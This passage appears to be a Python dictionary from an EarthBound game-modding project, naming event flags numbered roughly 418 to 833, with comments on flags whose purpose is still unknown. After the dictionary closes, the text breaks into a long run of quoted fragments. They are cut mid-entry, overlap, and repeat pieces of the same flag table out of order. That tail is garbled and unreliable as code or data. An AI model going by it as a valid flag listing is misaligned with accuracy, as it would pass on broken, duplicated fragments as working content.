    418: 'BRICK_ROAD_DUNGEON_PROTOPLASM_1_DEFEATED', 419: 'BRICK_ROAD_DUNGEON_PROTOPLASM_2_DEFEATED',
    420: 'BRICK_ROAD_DUNGEON_MOUSE_1_DEFEATED', 421: 'BRICK_ROAD_DUNGEON_MOUSE_2_DEFEATED',
    422: 'ONETT_DAYTIME', 423: 'UNDERWORLD_TALKING_ROCK_STOPPED_TALKING',
    424: 'TENDA_SHOP_PLAIN_ROLL_1', 425: 'TENDA_SHOP_PLAIN_YOGURT',
    426: 'TENDA_SHOP_PLAIN_ROLL_2', 427: 'TENDA_SHOP_SPICY_JERKY',
    428: 'TENDA_SHOP_BAG_OF_DRAGONITE', 429: 'TENDA_SHOP_TALISMAN_COIN',
    430: 'TENDA_SHOP_HALL_OF_FAME_BAT',
    # 431 (???)
    432: 'DEBUG_SKIP_SANDWICH_DX', 433: 'ZOMBIE_CHICK_HOTEL_MUSIC',
    434: 'STARMAN_DX_ABSENT', # (Another flag for Starman DX defeated. One of them might be responsible only for palette changes, maybe)
    435: 'GUARDIAN_GENERAL_DEFEATED', 436: 'SEA_OF_EDEN_KRAKEN_1_DEFEATED',
    437: 'SEA_OF_EDEN_KRAKEN_2_DEFEATED', 438: 'SEA_OF_EDEN_KRAKEN_3_DEFEATED',
    439: 'GOT_MAGIC_TRUFFLE_1', 440: 'GOT_MAGIC_TRUFFLE_2', 441: 'GOT_MAGIC_TRUFFLE_3',
    442: 'GOT_MAGIC_TRUFFLE_4', 443: 'GOT_MAGIC_TRUFFLE_5', 444: 'KING_JOINS',
    463: 'TALKED_TO_FRESH_EGG_GIVING_MONKEY', 464: 'GOT_KING_BANANA',
    # 465 (???)
    466: 'PICKY_SLEEPING_AT_METEORITE',
    # 467 (Unknown. Related to ... knocking?)
    468: 'POKEYS_HOUSE_LOCKED', 469: 'POLICE_AT_METEORITE',
    470: 'TALKED_TO_TRACY_AT_HER_ROOM', 471: 'TALKED_TO_MOM',
    472: 'TALKED_TO_POKEY_AT_METEORITE', 473: 'TRACY_AT_HALLWAY',
    474: 'NESS_MOM_OUTSIDE',
    # 475 (Handles continue yes/no on death. TODO: Investigate)
    476: 'POLICE_BARRIERS_AT_ONETT_HILLTOP', 477: 'NESS_SLEEPING_AT_HIS_BED',
    478: 'SHOP_SCARABA_CONDIMENTS', 479: 'PHOTO_NESS_HOUSE_AVAILABLE',
    480: 'PHOTO_SCAM_HOUSE_AVAILABLE', 481: 'PHOTO_CYCLE_SHOP_AVAILABLE',
    482: 'PHOTO_PEACEFUL_REST_VALLEY_AVAILABLE',
    491: 'PHOTO_BLACK_SESAME_SEED_AVAILABLE', 492: 'PHOTO_DESERT_MINE_AVAILABLE',
    493: 'PHOTO_FOURSIDE_BRIDGE_AVAILABLE', 494: 'PHOTO_FOURSIDE_MUSEUM_OUTSIDE_AVAILABLE',
    495: 'PHOTO_FOURSIDE_MUSEUM_INSIDE_AVAILABLE', 496: 'PHOTO_MONOTOLI_BUILDING_AVAILABLE',
    497: 'PHOTO_FOURSIDE_DEPT_STORE_AVAILABLE', 498: 'PHOTO_POOS_PALACE_INSIDE_AVAILABLE',
    499: 'PHOTO_POOS_PALACE_OUTSIDE_AVAILABLE', 500: 'PHOTO_STONEHENGE_AVAILABLE',
    501: 'PHOTO_SUMMERS_HOTEL_AVAILABLE', 502: 'PHOTO_FOURSIDE_RESTAURANT_AVAILABLE',
    503: 'PHOTO_SUMMERS_BEACH_AVAILABLE', 504: 'PHOTO_TOTO_AVAILABLE',
    505: 'PHOTO_SCARABA_BAZAAR_AVAILABLE', 506: 'PHOTO_PYRAMID_AVAILABLE',
    507: 'PHOTO_SCARABA_OASIS_AVAILABLE', 508: 'PHOTO_DEEP_DARKNESS_AVAILABLE',
    509: 'PHOTO_TENDA_VILLAGE_AVAILABLE', 510: 'PHOTO_SATURN_VALLEY_FINAL_AVAILABLE',
    511: 'GOT_TOWN_MAP', 512: 'HAS_EXIT_MOUSE', 513: 'ONETT_POST_METEORITE_MUSIC',
    514: 'JUST_RESTED_AT_HOME', 515: 'FRANK_DEFEATED', 516: 'MONKEY_CAVE_PENCIL_ERASED',
    517: 'NESS_ROOM_LIGHTS_ON', 518: 'GUARDIAN_MOLE_TEXT_1', 519: 'GUARDIAN_MOLE_TEXT_2',
    # 522 (Multipurpose?)
    # 523 (Multipurpose?)
    524: 'YOUR_SANCTUARY_MUSIC',
    # 525 (???)
    526: 'NEAR_BLUE_GEYSER_1', 527: 'NEAR_RED_GEYSER', 528: 'NEAR_BLUE_GEYSER_2',
    # 529 (???)
    530: 'TRACY_NOT_AT_HER_ROOM', 531: 'TRACY_DOWNSTAIRS',
    532: 'NESS_ROOM_METEORITE_FALLING_MUSIC', 533: 'NESS_ROOM_METEORITE_CRASH_MUSIC',
    534: 'CITY_BUS_MUSIC', 535: 'RUNAWAY_BUS_OR_SKY_RUNNER_FALLING_MUSIC',
    536: 'RUNAWAY_FIVE_FREE_MUSIC', 537: 'TESSIE_MUSIC',
    # 538 (???)
    539: 'GIVEN_PLAYERS_NAME',
    # 540 (???)
    541: 'OPENED_THREED_CEMETERY_UNDREGROUND_DOOR', 542: 'SAILING_OR_SUBMARINE_MUSIC',
    543: 'SAILING_POST_KRAKEN_MUSIC', 544: 'WINTERS_MUSIC',
    545: 'LAST_MELODY_AT_LILLIPUT_STEPS', 546: 'LAST_MELODY_AT_MILKY_WELL',
    547: 'LAST_MELODY_AT_PINK_CLOUD', 548: 'LAST_MELODY_AT_FIRE_SPRING',
    549: 'QUEUE_OUTSIDE_CHAOS_THEATER', 550: 'GOT_SUPORMA',
    555: 'FOURSIDE_DEPT_LIGHTS_OUT', 556: 'FOURSIDE_DEPT_BLACKOUT_JUST_ENDED',
    557: 'READY_TO_SAIL_TO_SCARABA', 558: 'HIDE_ONETT_DRUGSTORE_TOWN_MAP',
    559: 'HIDE_ONETT_BURGER_SHOP_TOWN_MAP', 560: 'HIDE_ONETT_HOTEL_TOWN_MAP',
    561: 'HIDE_ONETT_HOSPITAL_TOWN_MAP', 562: 'HIDE_ONETT_BAKERY_TOWN_MAP',
    563: 'HIDE_ONETT_TO_TWOSON_TOWN_MAP', 564: 'HIDE_TWOSON_HOTEL_TOWN_MAP',
    565: 'HIDE_TWOSON_DEPT_STORE_TOWN_MAP', 566: 'HIDE_TWOSON_TO_ONETT_TOWN_MAP',
    567: 'HIDE_TWOSON_BUS_STOP_TOWN_MAP', 568: 'HIDE_TWOSON_HOSPITAL_TOWN_MAP',
    569: 'HIDE_TWOSON_TO_THREED_TOWN_MAP', 570: 'HIDE_THREED_DRUGSTORE_TOWN_MAP',
    571: 'HIDE_THREED_HOTEL_TOWN_MAP',
    # 572 (???)
    573: 'HIDE_THREED_BAKERY_TOWN_MAP', 574: 'HIDE_THREED_HOSPITAL_TOWN_MAP',
    575: 'HIDE_FOURSIDE_HOSPITAL_TOWN_MAP', 576: 'HIDE_FOURSIDE_DEPT_STORE_TOWN_MAP',
    577: 'HIDE_FOURSIDE_BAKERY_TOWN_MAP', 578: 'HIDE_FOURSIDE_HOTEL_TOWN_MAP',
    579: 'HIDE_SCARABA_HOTEL_TOWN_MAP', 580: 'HIDE_SCARABA_HOSPITAL_TOWN_MAP',
    581: 'HIDE_SCARABA_SHOP_TOWN_MAP', 582: 'HIDE_SUMMERS_HOTEL_TOWN_MAP',
    583: 'HIDE_SUMMERS_RESTAURANT_TOWN_MAP', 584: 'HIDE_SUMMERS_SHOP_TOWN_MAP',
    585: 'HIDE_SUMMERS_HOSPITAL_TOWN_MAP', 586: 'HIDE_TOTO_SHOP_TOWN_MAP',
    587: 'FLYING_MAN_MUSIC',
    # 588 (Visibility flag for someone in Threed?)
    # 589 (Visibility flag for some Hotel Attendant?)
    590: 'HAPPY_THREED_PEOPLE',
    591: 'CHARRED_MONKEY_OUTSIDE_JACKIES_CAFE', # TODO: CONFIRM
    592: 'MONKEY_OUTSIDE_JACKIES_CAFE', # TODO: CONFIRM
    593: 'POO_TELEPORTING_TO_SUMMERS',
    594: 'BLOND_GUY_IN_FOURSIDE', # TODO: CONFIRM
    595: 'STAR_MASTER_NEXT_TO_MU',
    # 596 (???)
    597: 'SHOP_SCARABA_BAZAAR_FOOD', 598: 'SHOP_SCARABA_WATER',
    599: 'SHOP_SOUTH_SCARABA_VARIETY', 600: 'SHOP_DEEP_DARKNESS_BUSINESSMAN',
    601: 'SHATTERED_MAN_1_DEFEATED', 602: 'SHATTERED_MAN_2_DEFEATED',
    603: 'MINI_BARF_DEFEATED', 604: 'GOT_KEY_TO_THE_LOCKER',
    605: 'USED_KEY_TO_THE_LOCKER', 606: 'DUNGEON_MAN_OPEN',
    609: 'WINTERS_PENCIL_ERASED', 610: 'DETECTIVE_IN_THREED',
    # 611 (Something about talking to Paula's dad and not ...)
    614: 'TELEPORT_MONKEY_NEAR_MONKEY_CAVE_ENTRANCE', 615: 'TELEPORT_MONKEY_NEAR_DESERT_ROAD',
    616: 'TENDAKRAUT_STOLEN', 617: 'MAGIC_CAKE_LADY_AT_BEACH', 618: 'GOT_ERASER_ERASER',
    # 619 (Unknown. Related to Stonehenge Base)
    620: 'APPLE_MOUSE_AT_WINTERS_LAB', 621: 'MONKEYS_AT_WINTERS_LAB',
    622: 'BUBBLE_MONKEYS_WIFE_AT_WINTERS', 623: 'PUNK_GUY_OUTSIDE_HIS_HOUSE_THREED',
    624: 'EVERDRED_AT_HIS_HOUSE',
    # 625 (Something about "Fancy Pokey" in the Monotoli Building) -- Got kicked out of Pokey's Room in the Monotoli Building?
    626: 'MEN_ABOUT_TO_ENTER_CIRCUS_TENT', 627: 'TRACY_HAS_SOUND_STONE',
    632: 'MONSTERS_IN_ONETT', 633: 'LIERS_HOUSE_UNLOCKED',
    634: 'PAULA_TELEPATHY_DREAM_1', 635: 'PAULA_TELEPATHY_DREAM_2',
    636: 'PAULA_TELEPATHY_DREAM_JEFF', 637: 'POO_AT_HIS_PALACE',
    638: 'PAULA_AT_HER_ROOM', 639: 'TALKED_TO_MAGICANT_EVERDRED',
    640: 'HIDE_FOURSIDE_TO_DESERT_TOWN_MAP', 641: 'HIDE_THREED_TO_DESERT_TOWN_MAP',
    642: 'HIDE_THREED_TO_TWOSON_TOWN_MAP', 643: 'READY_TO_LOOK_AT_PHOTO_ALBUM',
    644: 'GOT_SATURN_RIBBON', 645: 'ESCARGO_EXPRESS_PICK_UP',
    646: 'FOR_SALE_SIGN_CUSTOMER_2', 647: 'FOR_SALE_SIGN_CUSTOMER_3',
    648: 'FOR_SALE_SIGN_CUSTOMER_4', 649: 'TALKED_TO_ROCK_BELOW_TENDA_VILALGE',
    650: 'GOT_MONKEYS_LOVE', 651: 'UNDERWORLD_TENDA_GATE_OPEN',
    652: 'USED_CARROT_KEY', 653: 'SHOP_DEEP_DARKNESS_ARMS_DEALER',
    654: 'DEEP_DARKNESS_BUSINESSMAN_PAID_DOCTORS_FEE', 655: 'SKY_RUNNER_MUSIC',
    656: 'ALT_BUY_SOUND_EFFECT', 657: 'BOUGHT_OR_SOLD_AT_SHOP', 658: 'BOUGHT_WEAPON',
    659: 'MOONSIDE_SWITCH_YES_NO', 660: 'ALT_NO_TALK_TEXT',
    661: 'CHOSEN_FOUR_SOULS_RETURNING_MUSIC',
    663: 'RETURNED_SHYNESS_BOOK', 664: 'TREMBLING_MONOTOLI_AT_48TH_FLOOR_ABSENT',
    665: 'GOT_LETTER_FROM_MOM', 666: 'GOT_LETTER_FROM_TONY', 667: 'GOT_LETTER_FROM_KIDS',
    668: 'TALKED_TO_MONTAGUE_AT_SATURN_VALLEY_BEFORE_MAGICANT',
    669: 'FLY_HONEY_TRASH_CAN_VISIBLE',
    # 671 (???)
    672: 'POKEY_FLIES_AWAY_BY_HELICOPTER', 673: 'HIDE_TWOSON_BURGLIN_BAKERY_TOWN_MAP',
    674: 'HIDE_SCARABA_FOOD_TOWN_MAP', 675: 'MACH_PIZZA_ZOMBIE_PAPER_DELIVERY',
    676: 'HIDE_THREED_BUS_STOP_1_TOWN_MAP', 677: 'HIDE_THREED_BUS_STOP_2_TOWN_MAP',
    678: 'HIDE_FOURSIDE_BUS_STOP_TOWN_MAP',
    # 679 (Something about Venus show about to start?)
    # 680 (Something about Venus show about to start?)
    681: 'SHOW_ONETT_HINT_TOWN_MAP', 682: 'SHOW_TWOSON_HINT_TOWN_MAP',
    683: 'SHOW_THREED_HINT_TOWN_MAP', 684: 'SHOW_FOURSIDE_HINT_TOWN_MAP',
    685: 'SHOW_SUMMERS_HINT_TOWN_MAP', 686: 'SHOW_SCARABA_HINT_TOWN_MAP',
    687: 'SCARABA_CULTURAL_MUSEUM_PHONE_RINGING', 688: 'HAS_CALLED_MOM',
    689: 'HAS_CALLED_MOM_AFTER_RESCUING_PAULA', 690: 'PAULA_KIDNAPPED_WITH_PENCIL_ERASER',
    691: 'POO_LEFT_WITH_HAWK_EYE', 692: 'ESCARGO_EXPRESS_HAS_PAULAS_PENCIL_ERASER',
    693: 'ESCARGO_EXPRESS_HAS_POOS_HAWK_EYE', 694: 'ESCARGO_EXPRESS_PENCIL_ERASER_DELIVERY',
    695: 'ESCARGO_EXPRESS_HAWK_EYE_DELIVERY', 696: 'RANDOM_JEFF_ITEM_FIX_CHANCE',
    697: 'SHARK_AT_ARCADE_UPSTAIRS_DEFEATED',
    698: 'GOT_PHOTO_NESS_HOUSE', 699: 'GOT_PHOTO_SCAM_HOUSE', 700: 'GOT_PHOTO_CYCLE_SHOP',
    701: 'GOT_PHOTO_PEACEFUL_REST_VALLEY', 702: 'GOT_PHOTO_HAPPY_HAPPY_CABIN',
    703: 'GOT_PHOTO_CHAOS_THEATER', 704: 'GOT_PHOTO_LAKE_TESS',
    705: 'GOT_PHOTO_BRICK_ROAD_DUNGEON', 706: 'GOT_PHOTO_THREED_CEMETERY',
    707: 'GOT_PHOTO_GRAPEFRUIT_FALLS', 708: 'GOT_PHOTO_SATURN_VALLEY_COFFEE',
    709: 'GOT_PHOTO_CIRCUS_TENT', 710: 'GOT_PHOTO_BLACK_SESAME_SEED',
    711: 'GOT_PHOTO_DESERT_MINE', 712: 'GOT_PHOTO_FOURSIDE_BRIDGE',
    713: 'GOT_PHOTO_FOURSIDE_MUSEUM_OUTSIDE', 714: 'GOT_PHOTO_FOURSIDE_MUSEUM_INSIDE',
    715: 'GOT_PHOTO_MONOTOLI_BUILDING', 716: 'GOT_PHOTO_FOURSIDE_DEPT_STORE',
    717: 'GOT_PHOTO_POOS_PALACE_INSIDE', 718: 'GOT_PHOTO_POOS_PALACE_OUTSIDE',
    719: 'GOT_PHOTO_STONEHENGE', 720: 'GOT_PHOTO_SUMMERS_HOTEL',
    721: 'GOT_PHOTO_FOURSIDE_RESTAURANT', 722: 'GOT_PHOTO_SUMMERS_BEACH',
    723: 'GOT_PHOTO_TOTO', 724: 'GOT_PHOTO_SCARABA_BAZAAR', 725: 'GOT_PHOTO_PYRAMID',
    726: 'GOT_PHOTO_SCARABA_OASIS', 727: 'GOT_PHOTO_DEEP_DARKNESS',
    728: 'GOT_PHOTO_TENDA_VILLAGE', 729: 'GOT_PHOTO_SATURN_VALLEY_FINAL',
    730: 'TALKED_TO_ONETT_BAKERY_LADY_TWICE', 731: 'SHOP_UNDERWORLD_TENDA',
    732: 'SHOP_MAGICANT', 733: 'SHOP_MOONSIDE', 734: 'ONETT_HOSPITAL_PATIENT_OWNER_JOKE',
    735: 'TALKED_TO_SMASH_WOUND_GIRLS_MOTHER', 736: 'GOT_PAIR_OF_DIRTY_SOCKS',
    737: 'TALKED_TO_TWOSON_HOTEL_GUY_AT_TABLE_NINE_TIMES',
    738: 'GOT_MONEY_FROM_TWOSON_HOTEL_GUY_AT_TABLE',
    739: 'PAULAS_DAD_RAN_IN_FRONT_OF_TWOSON_HOTEL', 740: 'PEOPLE_IN_THREED_ABSENT',
    741: 'MONOTOLI_AT_48TH_FLOOR', 742: 'LARDNA_AT_HOME',
    743: 'VISITED_HAPPY_HAPPY_VILLAGE', 744: 'TALKED_TO_CARPAINTER',
    745: 'QUEST_TO_YOGURT_MACHINE', 746: 'SCAM_HOUSE_UNLOCKED',
    # 747 (??? Something about Runaway Five Tour Bus???)
    748: 'SKY_RUNNER_AT_WINTERS_LAB', 749: 'NESS_WEARING_PAJAMAS',
    750: 'LEFT_HOME_AT_LEAST_ONCE', 751: 'CHAOS_THEATER_AUDIENCE_ABSENT',
    752: 'HINT_GUY_ABSENT', 753: 'NESS_HOUSE_PHONE_RINGING', 754: 'PREVENT_TELEPORT',
    755: 'GOT_INSIGNIFICANT_ITEM', 756: 'DUNGEON_MAN_IN_PARTY',
    757: 'GEORGE_HAS_DIAMOND', 758: 'GOING_TO_MAGICANT_MUSIC',
    759: 'VENUS_AND_RUNAWAY_FANS_AT_TOPOLLA', # Visibility flag for NPCs #851 and #852
    760: 'PHASE_DISTORTER_MUSIC',
    # 761 (Unknown. Set when arriving in Threed, cleared when defeating Belch)
    762: 'DUNGEON_MAN_GOODBYE_EXIT_SIGN', 763: 'PICKY_KNOCKING_ON_DOOR',
    764: 'READY_TO_LEARN_TELEPORT', 765: 'LEARNED_PHASE_DISTORTER_V2_FUNCTIONS',
    766: 'EXIT_MOUSE_DISAGREEABLE', 767: 'LEARNED_ABOUT_UNDERWORLD_GEYSERS',
    768: 'PAID_MUSEUM_ENTRANCE_FEE',
    # 769 (Checked when ... Tracy after defeating Giygas, but never set)
    770: 'LAST_ESCARGO_EXPRESS_CALL',
    # 771 (???)
    772: 'LAST_DAD_CALL',
    773: 'NERDY_GUY_AND_FAT_GUY_AT_CIRCUS_TENT', # Visibility flags for NPCs #457 and #459
    774: 'TALKED_TO_MOONSIDE_SAILOR_MAN',
    # 775 (Can't get calls from Dad?)
    776: 'PAULA_AT_MONOTOLI_BUILDING', 777: 'GOT_SYNESS_BOOK_BACK_FROM_TENDA',
    778: 'EXIT_MOUSE_ASLEEP',
    # 779 (Related to PREVENT_TELEPORT?)
    # 780 (If set, Maxwell doesn't actually save your game. WHAT?)
    805: 'PRESENT_CRACKED_BAT',
    829: 'PRESENT_TONY_COOKIE_1', 830: 'PRESENT_TONY_COOKIE_2',
    831: 'PRESENT_TONY_COOKIE_3', 832: 'PRESENT_TONY_COOKIE_4',
    833: 'PRESENT_TONY_COOKIE_5',
}
TODO: Investigate) 476: 'POLICE_BARRIERS_AT_ONETT_HILLTOP', 477: 'NESS_SLEEPING_AT_HIS_BED', 478: 'SHOP_SCARABA_CONDIMENTS', 479: 'PHOTO_NESS_HOUSE_AVAILABLE', 480: 'PHOTO_SCAM_HOUSE_AVAILABLE',", "554: 'GOT_YOGURT_DISPENSER', 555: 'FOURSIDE_DEPT_LIGHTS_OUT', 556: 'FOURSIDE_DEPT_BLACKOUT_JUST_ENDED', 557: 'READY_TO_SAIL_TO_SCARABA', 558: 'HIDE_ONETT_DRUGSTORE_TOWN_MAP', 559: 'HIDE_ONETT_BURGER_SHOP_TOWN_MAP', 560:", "'PHOTO_LAKE_TESS_AVAILABLE', 486: 'PHOTO_BRICK_ROAD_DUNGEON_AVAILABLE', 487: 'PHOTO_THREED_CEMETERY_AVAILABLE', 488: 'PHOTO_GRAPEFRUIT_FALLS_AVAILABLE', 489: 'PHOTO_SATURN_VALLEY_COFFEE_AVAILABLE', 490: 'PHOTO_CIRCUS_TENT_AVAILABLE', 491: 'PHOTO_BLACK_SESAME_SEED_AVAILABLE',", "Related to Boogey Tent) 374: 'TOPOLLA_THEATER_BACKSTAGE_UNBLOCKED', 375: 'PEOPLE_IN_ONETT', # 376 (Unknown. Set after", "658: 'BOUGHT_WEAPON', 659: 'MOONSIDE_SWITCH_YES_NO', 660: 'ALT_NO_TALK_TEXT', 661: 'CHOSEN_FOUR_SOULS_RETURNING_MUSIC', 662: 'DUNGEON_MAN_DESERT_MUSIC', 663: 'RETURNED_SHYNESS_BOOK', 664:", "'PAULA_KIDNAPPED_WITH_PENCIL_ERASER', 691: 'POO_LEFT_WITH_HAWK_EYE', 692: 'ESCARGO_EXPRESS_HAS_PAULAS_PENCIL_ERASER', 693: 'ESCARGO_EXPRESS_HAS_POOS_HAWK_EYE', 694: 'ESCARGO_EXPRESS_PENCIL_ERASER_DELIVERY', 695: 'ESCARGO_EXPRESS_HAWK_EYE_DELIVERY', 696: 'RANDOM_JEFF_ITEM_FIX_CHANCE',", "'FIVE_COPS_AT_POLICE_STATION', 39: 'COP_AT_STATION_ENTRANCE', 40: 'SHARK_GUARDING_FRANK_DEFEATED', 41: 'CHAOS_THEATER_STAGE_UNBLOCKED', 42: 'APPLE_KID_IN_BURGLIN_PARK', 43: 'RUNAWAY_FIVE_FAN_GIRL_OUTSIDE_BACKSTAGE', 44: 'POKEY_OUTSIDE_HH_HQ',", "'CONQUERED_SANCTUARY_8', # 198 (Unknown. Set when Paula joins) 199: 'GOT_DAD_PHONE', 200: 'GOT_MOM_PHONE', 201:", "'HIDE_TWOSON_BUS_STOP_TOWN_MAP', 568: 'HIDE_TWOSON_HOSPITAL_TOWN_MAP', 569: 'HIDE_TWOSON_TO_THREED_TOWN_MAP', 570: 'HIDE_THREED_DRUGSTORE_TOWN_MAP', 571: 'HIDE_THREED_HOTEL_TOWN_MAP', # 572 (???) 573:", "694: 'ESCARGO_EXPRESS_PENCIL_ERASER_DELIVERY', 695: 'ESCARGO_EXPRESS_HAWK_EYE_DELIVERY', 696: 'RANDOM_JEFF_ITEM_FIX_CHANCE', 697: 'SHARK_AT_ARCADE_UPSTAIRS_DEFEATED', 698: 'GOT_PHOTO_NESS_HOUSE', 699: 'GOT_PHOTO_SCAM_HOUSE', 700:", "586: 'HIDE_TOTO_SHOP_TOWN_MAP', 587: 'FLYING_MAN_MUSIC', # 588 (Visibility flag for someone in Threed?) 
#", "629: 'PARTY_IS_DIRTY_FROM_BELCH_FIGHT', 630: 'BUBBLE_MONKEY_AT_LAKE_TESS', 631: 'TALKED_TO_MOONSIDE_MONOTOLI', 632: 'MONSTERS_IN_ONETT', 633: 'LIERS_HOUSE_UNLOCKED', 634: 'PAULA_TELEPATHY_DREAM_1', 635:", "210: 'VISITED_TWOSON', 211: 'VISITED_THREED', 212: 'VISITED_WINTERS', 213: 'VISITED_SATURN_VALLEY', 214: 'VISITED_FOURSIDE', 215: 'VISITED_SUMMERS', 216:", "and not talking to Everdred) 612: 'EVERDRED_NOT_AT_ROOF', 613: 'TELEPORT_MONKEY_NOT_AT_CAVE', 614: 'TELEPORT_MONKEY_NEAR_MONKEY_CAVE_ENTRANCE', 615: 'TELEPORT_MONKEY_NEAR_DESERT_ROAD',", "'USED_ELEVATOR', 351: 'HH_HQ_CULTIST_1_DEFEATED', 352: 'HH_HQ_CULTIST_2_DEFEATED', 353: 'HH_HQ_CULTIST_3_DEFEATED', 354: 'HH_HQ_CULTIST_4_DEFEATED', 355: 'HH_HQ_CULTIST_5_DEFEATED', 356: 'HH_HQ_CULTIST_6_DEFEATED',", "'PHOTO_HAPPY_HAPPY_CABIN_AVAILABLE', 484: 'PHOTO_CHAOS_THEATER_AVAILABLE', 485: 'PHOTO_LAKE_TESS_AVAILABLE', 486: 'PHOTO_BRICK_ROAD_DUNGEON_AVAILABLE', 487: 'PHOTO_THREED_CEMETERY_AVAILABLE', 488: 'PHOTO_GRAPEFRUIT_FALLS_AVAILABLE', 489: 'PHOTO_SATURN_VALLEY_COFFEE_AVAILABLE',", "flags) # 231 (I hate multipurpose flags) # 232 (I hate multipurpose flags)", "'BOOGEY_TENT_IN_THREED', 50: 'BRICK_ROAD_OUTSIDE_DUNGEON', 51: 'SHYNESS_BOOK_AT_LIBRARY', 52: 'CAPTIVES_AT_STONEHENGE', 53: 'TALKED_TO_BRICK_ROAD', # 54 (Montague at", "you talk to Tracy after defeating Giygas, but never set) 770: 'LAST_ESCARGO_EXPRESS_CALL', #", "of Pokey's Room in the Monotoli Building? 626: 'MEN_ABOUT_TO_ENTER_CIRCUS_TENT', 627: 'TRACY_HAS_SOUND_STONE', 628: 'PRESENTS_AT_SATURN_VALLEY',", "'GOT_PAK_OF_BUBBLE_GUM', 324: 'SHOP_RED_SNAKE', 325: 'SHOP_SCARABA_BAZAAR_EQUIPMENT', 326: 'SHOP_SCARABA_HOTEL_ARMS_DEALER', 327: 'PHASE_DISTORTER_V3_AT_CAVE_OF_THE_PRESENT', 328: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_1', 329: 'APPLE_KID_AT_CAVE_OF_THE_PRESENT',", "63: 'PATH_TO_MANI_MANI_OPEN', 64: 'FRANKYSTEIN_MKII_DEFEATED', # 65 (???) 66: 'EVERDRED_DEFEATED', 67: 'FOOD_STAND_MONITOR_DEFEATED', 68: 'CARPAINTER_DEFEATED',", "palette) 288: 'USED_HAWK_EYE', 289: 'ONETT_COP_1_DEFEATED', 290: 'ONETT_COP_2_DEFEATED', 291: 'ONETT_COP_3_DEFEATED', 292: 'ONETT_COP_4_DEFEATED', 293: 'ONETT_COP_5_DEFEATED',", "'GOT_PHOTO_HAPPY_HAPPY_CABIN', 703: 'GOT_PHOTO_CHAOS_THEATER', 704: 'GOT_PHOTO_LAKE_TESS', 705: 'GOT_PHOTO_BRICK_ROAD_DUNGEON', 706: 'GOT_PHOTO_THREED_CEMETERY', 707: 'GOT_PHOTO_GRAPEFRUIT_FALLS', 708: 'GOT_PHOTO_SATURN_VALLEY_COFFEE',", "'JUST_WOKE_UP_FROM_MAGICANT', 350: 'USED_ELEVATOR', 351: 'HH_HQ_CULTIST_1_DEFEATED', 352: 'HH_HQ_CULTIST_2_DEFEATED', 353: 'HH_HQ_CULTIST_3_DEFEATED', 354: 'HH_HQ_CULTIST_4_DEFEATED', 355: 'HH_HQ_CULTIST_5_DEFEATED',", "688: 'HAS_CALLED_MOM', 689: 'HAS_CALLED_MOM_AFTER_RESCUING_PAULA', 690: 'PAULA_KIDNAPPED_WITH_PENCIL_ERASER', 691: 'POO_LEFT_WITH_HAWK_EYE', 692: 'ESCARGO_EXPRESS_HAS_PAULAS_PENCIL_ERASER', 693: 'ESCARGO_EXPRESS_HAS_POOS_HAWK_EYE', 694:", "'CHAOS_THEATER_STAGE_UNBLOCKED', 42: 'APPLE_KID_IN_BURGLIN_PARK', 43: 'RUNAWAY_FIVE_FAN_GIRL_OUTSIDE_BACKSTAGE', 44: 'POKEY_OUTSIDE_HH_HQ', 45: 'POKEY_OUTSIDE_PAULA_CABIN', 46: 'ZOMBIE_CHICK_OUTSIDE_HOTEL', 47: 'BROKEN_SKYRUNNER_THREED',", "# 370 (Unknown. Related to traffic jam?) # 371 (???) 372: 'PARTY_IS_ROBOTIFIED', #", "'POKEY_WAITING_MOM_GOODBYE', 97: 'NESS_HOUSE_POKEY_MUSIC', 98: 'ANSWERED_DADS_CALL', 99: 'BOUGHT_SCAM_HOUSE', 100: 'KING_WONT_JOIN', 101: 'LEARNED_THAT_LIER_SOLD_THE_MANI_MANI', 102: 'TALKED_TO_SHYGUY_ABOUT_SHYNESS_BOOK',", "164 (???) 
165: 'INVISIBLE_MAN_JOINS', 166: 'MOONSIDE_COUNTDOWN_GUY_1', 167: 'MOONSIDE_COUNTDOWN_GUY_2', 168: 'MOONSIDE_COUNTDOWN_GUY_3', 169: 'PHASE_DISTORTER_V2_BEING_FINISHED', #", "'PICKY_SLEEPING_AT_METEORITE', # 467 (Unknown. Related to Ness's house door knocking?) 468: 'POKEYS_HOUSE_LOCKED', 469:", "611 (Something about talking to Paula's dad and not talking to Everdred) 612:", "674: 'HIDE_SCARABA_FOOD_TOWN_MAP', 675: 'MACH_PIZZA_ZOMBIE_PAPER_DELIVERY', 676: 'HIDE_THREED_BUS_STOP_1_TOWN_MAP', 677: 'HIDE_THREED_BUS_STOP_2_TOWN_MAP', 678: 'HIDE_FOURSIDE_BUS_STOP_TOWN_MAP', # 679 (Something", "387: 'MOONSIDE_CAFE_ROBO_PUMP_DEFEATED', 388: 'MOONSIDE_MUSEUM_ROBO_PUMP_DEFEATED', 389: 'MOONSIDE_HOSPITAL_ABSTRACT_ART_DEFEATED', 390: 'GUARDIAN_HIEROGLYPH_1_DEFEATED', # The first Hieroglyph Guardian", "when defeating Belch) 762: 'DUNGEON_MAN_GOODBYE_EXIT_SIGN', 763: 'PICKY_KNOCKING_ON_DOOR', 764: 'READY_TO_LEARN_TELEPORT', 765: 'LEARNED_PHASE_DISTORTER_V2_FUNCTIONS', 766: 'EXIT_MOUSE_DISAGREEABLE',", "266: 'SHOP_SUMMERS_RESTAURANT', 267: 'SHOP_TOTO_SHOP', 268: 'SHOP_SUMMERS_GELATO', 269: 'SHOP_MAGIC_CAKE_LADY', 270: 'SHOP_DALAAM_RESTAURANT', 271: 'SHOP_SCARABA_HASSANS_SHOP', 272:", "'DESERT_MINE_BULLDOZER_MOVED', 334: 'BUBBLE_MONKEY_JOINS', 335: 'TONY_AT_BOARDING_SCHOOL_GATE', 336: 'GOT_KEY_TO_DUNGEON_MAN', 337: 'CALLED_STOIC_CLUB', 338: 'NEAR_WINTERS_ROPE', 339: 'APPLE_KID_NOT_AT_HIS_HOUSE',", "multipurpose flags) # 227 (I hate multipurpose flags) # 228 (I hate multipurpose", "669: 'FLY_HONEY_TRASH_CAN_VISIBLE', 670: 'GOT_FOR_SALE_SIGN', # 671 (???) 672: 'POKEY_FLIES_AWAY_BY_HELICOPTER', 673: 'HIDE_TWOSON_BURGLIN_BAKERY_TOWN_MAP', 674: 'HIDE_SCARABA_FOOD_TOWN_MAP',", "'POO_LEARNING_STARSTORM', 18: 'BUZZ_BUZZ_IN_PARTY', 19: 'SLEEPING_KING_ABSENT', 20: 'PICKY_IN_PARTY', 21: 'POKEY_IN_PARTY', 22: 'BUBBLE_MONKEY_IN_PARTY', 23: 